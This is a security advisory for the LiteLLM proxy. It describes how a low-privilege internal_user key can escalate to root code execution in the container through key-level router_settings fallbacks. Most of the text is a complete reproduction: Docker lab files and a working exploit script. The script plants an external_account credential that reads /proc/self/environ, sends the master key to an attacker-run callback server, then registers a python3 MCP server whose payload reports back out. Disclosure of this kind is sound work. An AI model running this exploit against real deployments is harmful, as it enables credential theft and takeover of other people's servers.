All advisories

Authenticated internal_user → container RCE via key-level router_settings fallbacks

BerriAI/litellm / GHSA-359r-8843-7vfx

Affected packages

litellm pip
Affected versions< 1.93.0
Patched versionsNot specified

Description

Authenticated internal_user → container RCE via key-level router_settings fallbacks

Summary

A low-privilege internal_user can attach an arbitrary router_settings.fallbacks dict to a virtual key via POST /key/generate. LiteLLM stores it and later merges it verbatim into a live provider call. The dict accepts provider, credentials and network config, so the attacker supplies a Google external_account credential with credential_source.file = /proc/self/environ and an attacker-controlled token_url. When the fallback fires, Google Auth reads the proxy's environment and POSTs it to the attacker, disclosing LITELLM_MASTER_KEY. That key authenticates as PROXY_ADMIN, which registers a stdio MCP server running python3 — its health check spawns the process, giving arbitrary code execution inside the LiteLLM container.

  • Class: authenticated privilege escalation → RCE (P2)
  • Requires: one valid internal_user key. No misconfiguration — the master key is correctly set and is stolen, not absent (so this is not the out-of-scope "no master_key" case).
  • Impact: Python execution as uid=0 in the LiteLLM container; full master-key compromise; arbitrary file read as a standalone primitive.
  • Version: 1.95.0, commit 2412326, default config.

Root cause

(a) A virtual key accepts unconstrained key-level router settings. KeyRequestBase.router_settings is an UpdateRouterConfig whose fallbacks is a free-form list of dicts — not limited to model names (types/router.py):

class UpdateRouterConfig(BaseModel):
    ...
    fallbacks: Optional[List[dict]] = None          # arbitrary dicts, not just model names

(b) /key/generate persists it verbatim, with no privilege filter. The non-admin path checks user_id/team_id/budgets but never rejects or reduces router_settings for an internal_user (key_management_endpoints.py:3635):

# attacker-controlled router_settings serialized straight into the key row
router_settings_json = safe_dumps(router_settings) if router_settings is not None else safe_dumps({})

(c) The stored fallback dict is merged into the live provider call. This is the trust-boundary crossing: when the primary model fails, every field of the attacker's dict is spread into the request kwargs (fallback_event_handlers.py:131-134):

if isinstance(mg, str):
    kwargs["model"] = mg
elif isinstance(mg, dict):
    kwargs.update(mg)          # <-- provider, credentials, api_base ... all attacker-set

The key row's stored settings reach this point via a per-request override (lookup → apply).

(d) external_account credentials turn that into arbitrary file read + exfiltration. The fallback selects vertex_ai_beta with a serialized Google external-account credential; LiteLLM builds identity-pool creds and refreshes them, and the refresh reads credential_source.file and POSTs it to token_url (vertex_llm_base.py:131):

if "type" in json_obj and json_obj["type"] == "external_account":
    creds = self._credentials_from_identity_pool(json_obj, scopes=...)
...
credentials.refresh(Request())   # reads credential_source.file -> POST to token_url

With credential_source.file = /proc/self/environ, the attacker's token_url receives LITELLM_MASTER_KEY.

(e) The stolen master key reaches the admin-only stdio-MCP sink. POST /v1/mcp/server requires PROXY_ADMIN — satisfied by the stolen key — and python3 is in the default stdio command allowlist, so the health check spawns it (MCP create · allowlist).

The primary auth bug is (b); the MCP feature is only the final sink.

Reproduction (self-contained — no attachments required)

The lab is three files, written inline below: docker-compose.yml, config.yaml and exp.py. It is a stock LiteLLM + Postgres deployment; the only deviations from the upstream docker-compose.yml are pinning the source commit under test and a config.yaml with one ordinary model (every usable proxy configures at least one — its identity is irrelevant, the exploit just forces it to fail). Stock entrypoint, no custom code.

Requirements: Linux x86-64, Docker + Compose, Python 3.9+, outbound GitHub access. Run each step below in order, in one empty directory — expand each file block, paste it, then run the command under it.

1. Write the deployment files, then start the proxy (built at the pinned commit, bound to 127.0.0.1:4000):

write docker-compose.yml
cat > docker-compose.yml <<'COMPOSE'
# Default-style deployment: LiteLLM proxy + PostgreSQL, stock entrypoint.
# Deviations from the upstream docker-compose.yml are only: (1) `build:` pins the
# exact source commit under test (upstream ships a pre-built image), and (2) a
# config.yaml with one ordinary model — every usable proxy configures at least
# one. Master key, STORE_MODEL_IN_DB and DB creds are the standard values.
services:
  db:
    image: postgres:16
    environment:
      POSTGRES_DB: litellm
      POSTGRES_USER: llmproxy
      POSTGRES_PASSWORD: dbpassword9090
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U llmproxy -d litellm"]
      interval: 2s
      timeout: 5s
      retries: 30
    volumes:
      - postgres-data:/var/lib/postgresql/data

  litellm:
    build:
      context: https://github.com/BerriAI/litellm.git#24123269ccb76f36298a2457589f08bd3141072c
    image: litellm-rce-target:24123269ccb76f36298a2457589f08bd3141072c
    depends_on:
      db:
        condition: service_healthy
    environment:
      DATABASE_URL: postgresql://llmproxy:dbpassword9090@db:5432/litellm
      LITELLM_MASTER_KEY: sk-1234
      STORE_MODEL_IN_DB: "True"
    command: ["--config=/app/config.yaml", "--port=4000"]
    volumes:
      - ./config.yaml:/app/config.yaml:ro
    ports:
      - "127.0.0.1:${LITELLM_PORT:-4000}:4000"
    extra_hosts:
      - host.docker.internal:host-gateway
    healthcheck:
      test: ["CMD-SHELL", "python3 -c \"import urllib.request; urllib.request.urlopen('http://127.0.0.1:4000/health/liveliness')\""]
      interval: 3s
      timeout: 5s
      retries: 60
      start_period: 20s

volumes:
  postgres-data:
COMPOSE
write config.yaml
cat > config.yaml <<'CONFIG'
# One ordinary model — every usable LiteLLM proxy configures at least one.
# Its identity is irrelevant to the bug: the exploit forces this primary to fail
# (tiny per-request timeout) so the attacker-supplied key-level fallback runs.
model_list:
  - model_name: gpt-3.5-turbo
    litellm_params:
      model: openai/gpt-3.5-turbo
      api_key: sk-not-a-real-key
CONFIG
docker compose up --build --wait     # LITELLM_PORT=4001 to change the port

2. Create one ordinary internal_user — the single one-time admin action any real proxy performs. /user/new returns the user's virtual key:

USER_KEY=$(curl -s -X POST http://127.0.0.1:4000/user/new \
  -H 'Authorization: Bearer sk-1234' -H 'Content-Type: application/json' \
  -d '{"user_role":"internal_user"}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["key"])')

3. Write the exploit, then run it with ONLY that low-privilege key (the master key is never given to exp.py):

write exp.py (stdlib only)
cat > exp.py <<'PYEOF'
#!/usr/bin/env python3

import argparse
import concurrent.futures
import http.server
import json
import os
import platform
import socket
import sys
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid


class ExploitError(RuntimeError):
    pass


def parse_args():
    parser = argparse.ArgumentParser(
        description="LiteLLM internal_user router-settings to container RCE reproducer"
    )
    parser.add_argument("--url", default="http://127.0.0.1:4000")
    parser.add_argument("--model", default="gpt-3.5-turbo")
    parser.add_argument("--callback-host", default="host.docker.internal")
    parser.add_argument("--secret-file", default="/proc/self/environ")
    parser.add_argument("--allow-remote", action="store_true")
    return parser.parse_args()


class ApiClient:
    def __init__(self, base_url):
        self.base_url = base_url.rstrip("/")

    def request(self, route, method="GET", bearer=None, body=None, timeout=20):
        headers = {}
        payload = None
        if bearer:
            headers["Authorization"] = "Bearer " + bearer
        if body is not None:
            headers["Content-Type"] = "application/json"
            payload = json.dumps(body).encode()

        request = urllib.request.Request(
            self.base_url + route,
            data=payload,
            headers=headers,
            method=method,
        )
        try:
            with urllib.request.urlopen(request, timeout=timeout) as response:
                status = response.status
                raw = response.read()
        except urllib.error.HTTPError as error:
            status = error.code
            raw = error.read()

        try:
            parsed = json.loads(raw) if raw else None
        except (json.JSONDecodeError, UnicodeDecodeError):
            parsed = raw.decode("utf-8", errors="replace")
        return status, parsed


def require_ok(result, stage, expected=None):
    status, body = result
    valid = 200 <= status < 300
    if expected is not None:
        valid = valid and status == expected
    if not valid:
        raise ExploitError(
            "{} failed with HTTP {}: {}".format(stage, status, json.dumps(body))
        )
    return body


def extract_master_key(subject_token):
    for entry in subject_token.split("\0"):
        if entry.startswith("LITELLM_MASTER_KEY="):
            return entry[len("LITELLM_MASTER_KEY=") :]

    for line in subject_token.splitlines():
        if line.startswith("LITELLM_MASTER_KEY="):
            return line[len("LITELLM_MASTER_KEY=") :]
    return None


class CallbackState:
    def __init__(self, run_id, secret_file):
        self.run_id = run_id
        self.secret_file = secret_file
        self.master_key = None
        self.proof = None
        self.error = None
        self.leak_event = threading.Event()
        self.proof_event = threading.Event()


def make_callback_handler(state):
    class CallbackHandler(http.server.BaseHTTPRequestHandler):
        def log_message(self, _format, *_args):
            return

        def send_json(self, status, body):
            data = json.dumps(body).encode()
            self.send_response(status)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def do_POST(self):
            try:
                length = int(self.headers.get("Content-Length", "0"))
                body = self.rfile.read(length)

                if self.path == "/oauth/{}".format(state.run_id):
                    form = urllib.parse.parse_qs(body.decode("utf-8"))
                    subject_token = form.get("subject_token", [""])[0]
                    for kvstring in subject_token.split("\0"):
                        print(f"    {kvstring}")
                    master_key = extract_master_key(subject_token)
                    if not master_key:
                        state.error = ExploitError(
                            "Exfiltrated file did not contain LITELLM_MASTER_KEY ({})".format(
                                state.secret_file
                            )
                        )
                        self.send_json(400, {"error": "master_key_not_found"})
                        state.leak_event.set()
                        return

                    state.master_key = master_key
                    self.send_json(
                        200,
                        {
                            "access_token": "secret-oauth-" + state.run_id,
                            "token_type": "Bearer",
                            "expires_in": 3600,
                        },
                    )
                    state.leak_event.set()
                    return

                if self.path == "/vertex/{}:generateContent".format(state.run_id):
                    self.send_json(
                        500, {"error": {"message": "intentional fallback sink"}}
                    )
                    return

                if self.path == "/proof/{}".format(state.run_id):
                    state.proof = json.loads(body)
                    self.send_response(204)
                    self.end_headers()
                    state.proof_event.set()
                    return

                self.send_response(404)
                self.end_headers()
            except Exception as error:
                state.error = error
                state.leak_event.set()
                state.proof_event.set()
                self.send_response(400)
                self.end_headers()

    return CallbackHandler


def external_account_credentials(oauth_url, secret_file):
    return json.dumps(
        {
            "type": "external_account",
            "audience": (
                "//iam.googleapis.com/projects/123/locations/global/"
                "workloadIdentityPools/pool/providers/provider"
            ),
            "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
            "token_url": oauth_url,
            "credential_source": {
                "file": secret_file,
                "format": {"type": "text"},
            },
        }
    )


def create_exploit_key(client, internal_key, user_id, model, state, callback_host, port):
    oauth_url = "http://{}:{}/oauth/{}".format(callback_host, port, state.run_id)
    vertex_url = "http://{}:{}/vertex/{}".format(callback_host, port, state.run_id)
    body = require_ok(
        client.request(
            "/key/generate",
            method="POST",
            bearer=internal_key,
            body={
                "user_id": user_id,
                "key_alias": "exploit-{}".format(state.run_id),
                "router_settings": {
                    "fallbacks": [
                        {
                            "model": model,
                            "custom_llm_provider": "vertex_ai_beta",
                            "vertex_project": "p2o-project",
                            "vertex_location": "us-central1",
                            "vertex_credentials": external_account_credentials(
                                oauth_url, state.secret_file
                            ),
                            "api_base": vertex_url,
                            "timeout": 5,
                            "num_retries": 0,
                        }
                    ]
                },
            },
        ),
        "malicious key generation",
    )
    key = body.get("key") if isinstance(body, dict) else None
    if not key:
        raise ExploitError("Key generation response did not contain a virtual key")
    print(
        "[1/5] low-level internal_user key stored unchecked provider fallback settings"
    )
    return key


def trigger_fallback(client, exploit_key, model):
    return client.request(
        "/v1/chat/completions",
        method="POST",
        bearer=exploit_key,
        body={
            "model": model,
            "messages": [{"role": "user", "content": "p2o"}],
            "timeout": 0.000001,
        },
        timeout=30,
    )


def python_proof_payload(marker_path, proof_url):
    statements = [
        "import json,os,platform,socket,urllib.request",
        "marker={}".format(repr(marker_path)),
        "open(marker,'w').write('LITELLM_INTERNAL_USER_E2E_RCE\\n')",
        (
            "data=json.dumps({'proof':'LITELLM_INTERNAL_USER_E2E_RCE',"
            "'uid':os.getuid() if hasattr(os,'getuid') else None,"
            "'cwd':os.getcwd(),'hostname':socket.gethostname(),"
            "'platform':platform.platform(),'marker':marker}).encode()"
        ),
        (
            "req=urllib.request.Request({},data=data,"
            "headers={{'Content-Type':'application/json'}},method='POST')"
        ).format(repr(proof_url)),
        "urllib.request.urlopen(req,timeout=5).read()",
    ]
    return ";".join(statements)


def main():
    args = parse_args()
    parsed_target = urllib.parse.urlparse(args.url)
    if parsed_target.hostname not in {"127.0.0.1", "localhost", "::1"}:
        if not args.allow_remote:
            raise ExploitError(
                "Refusing a non-loopback target without --allow-remote"
            )

    client = ApiClient(args.url)
    internal_key = os.environ.get("LITELLM_INTERNAL_USER_KEY")
    if not internal_key:
        raise ExploitError(
            "Missing low-level key in LITELLM_INTERNAL_USER_KEY"
        )

    self_info = require_ok(
        client.request("/user/info", bearer=internal_key), "self user lookup"
    )
    user_id = self_info.get("user_id") or self_info.get("user_info", {}).get(
        "user_id"
    )
    if not user_id:
        raise ExploitError("Unable to determine internal_user user_id")

    started_at = time.monotonic()
    run_id = str(uuid.uuid4()).replace("-", "_")
    server_id = "p2o_internal_rce_" + run_id
    marker_path = "/tmp/litellm_internal_p2o_" + run_id
    state = CallbackState(run_id, args.secret_file)
    server = http.server.ThreadingHTTPServer(
        ("0.0.0.0", 0), make_callback_handler(state)
    )
    callback_port = server.server_address[1]
    server_thread = threading.Thread(target=server.serve_forever, daemon=True)
    server_thread.start()

    try:
        exploit_key = create_exploit_key(
            client,
            internal_key,
            user_id,
            args.model,
            state,
            args.callback_host,
            callback_port,
        )

        with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:
            request_future = executor.submit(
                trigger_fallback, client, exploit_key, args.model
            )
            if not state.leak_event.wait(15):
                raise ExploitError(
                    "Timed out waiting for external-account subject token"
                )
            request_future.result(timeout=30)

        if state.error:
            raise state.error
        if not state.master_key:
            raise ExploitError("OAuth callback did not yield a master key")
        print(
            "[2/5] fallback exfiltrated LITELLM_MASTER_KEY from {}".format(
                args.secret_file
            )
        )

        proof_url = "http://{}:{}/proof/{}".format(
            args.callback_host, callback_port, run_id
        )
        mcp_body = require_ok(
            client.request(
                "/v1/mcp/server",
                method="POST",
                bearer=state.master_key,
                body={
                    "server_id": server_id,
                    "server_name": server_id,
                    "alias": server_id,
                    "transport": "stdio",
                    "command": "python3",
                    "args": ["-c", python_proof_payload(marker_path, proof_url)],
                    "env": {},
                    "allow_all_keys": False,
                    "mcp_info": {"proof_marker": marker_path},
                },
            ),
            "stdio MCP server creation",
            expected=201,
        )
        if (
            mcp_body.get("server_id") != server_id
            or mcp_body.get("transport") != "stdio"
        ):
            raise ExploitError("Unexpected MCP server creation response")
        print("[3/5] recovered master key created a stdio MCP server")

        require_ok(
            client.request(
                "/v1/mcp/server/health?server_ids={}".format(
                    urllib.parse.quote(server_id)
                ),
                bearer=state.master_key,
            ),
            "stdio MCP health-check trigger",
        )
        print("[4/5] MCP health check spawned the controlled command")

        if not state.proof_event.wait(15):
            raise ExploitError("Timed out waiting for target execution proof")
        if state.error:
            raise state.error
        if state.proof.get("proof") != "LITELLM_INTERNAL_USER_E2E_RCE":
            raise ExploitError("Received invalid target execution proof")
        print("[5/5] target Python process returned container execution evidence")

        output = {
            "success": True,
            "elapsed_seconds": round(time.monotonic() - started_at, 3),
            "target": args.url.rstrip("/"),
            "model": args.model,
            "server_id": server_id,
            "proof": state.proof,
            "attacker_host": socket.gethostname(),
            "attacker_platform": platform.platform(),
        }
        print(json.dumps(output, indent=2))
    finally:
        state.master_key = None
        server.shutdown()
        server.server_close()
        server_thread.join(timeout=2)


if __name__ == "__main__":
    try:
        main()
    except (ExploitError, OSError, urllib.error.URLError) as error:
        print("error: {}".format(error), file=sys.stderr)
        sys.exit(1)
PYEOF
LITELLM_INTERNAL_USER_KEY="$USER_KEY" python3 exp.py --url http://127.0.0.1:4000
# add --allow-remote for a non-loopback target

exp.py runs five stages:

  • 0 — read the internal_user's user_id via /user/info.
  • 1 — POST /key/generate with the malicious external_account fallback.
  • 2 — POST /v1/chat/completions with a tiny timeout → primary fails → fallback reads /proc/self/environ → callback extracts LITELLM_MASTER_KEY.
  • 3 — POST /v1/mcp/server (stdio, python3 -c <proof>) with the master key.
  • 4 — GET /v1/mcp/server/health spawns the process.
  • 5 — the process writes a /tmp marker and reports back; success requires it.

Expected output (proof of container execution):

{ "success": true,
  "proof": { "proof": "LITELLM_INTERNAL_USER_E2E_RCE", "uid": 0,
             "cwd": "/app", "hostname": "<container-id>",
             "marker": "/tmp/litellm_internal_p2o_<run-id>" } }

uid:0 + the container cwd/hostname + the on-disk marker prove attacker code ran in the container — from nothing but one internal_user key.

4. Confirm out-of-band — read the marker straight from the container (independent of the exploit's own callback). It is owned by root, proving code executed as uid=0 inside the LiteLLM container:

docker compose exec litellm sh -c 'ls -l /tmp/litellm_internal_p2o_* && cat /tmp/litellm_internal_p2o_*'
# -rw-r--r-- 1 root root 30 ... /tmp/litellm_internal_p2o_<run-id>
# LITELLM_INTERNAL_USER_E2E_RCE

https://github.com/user-attachments/assets/84ecbe71-512c-4851-b227-80fc822e2f0f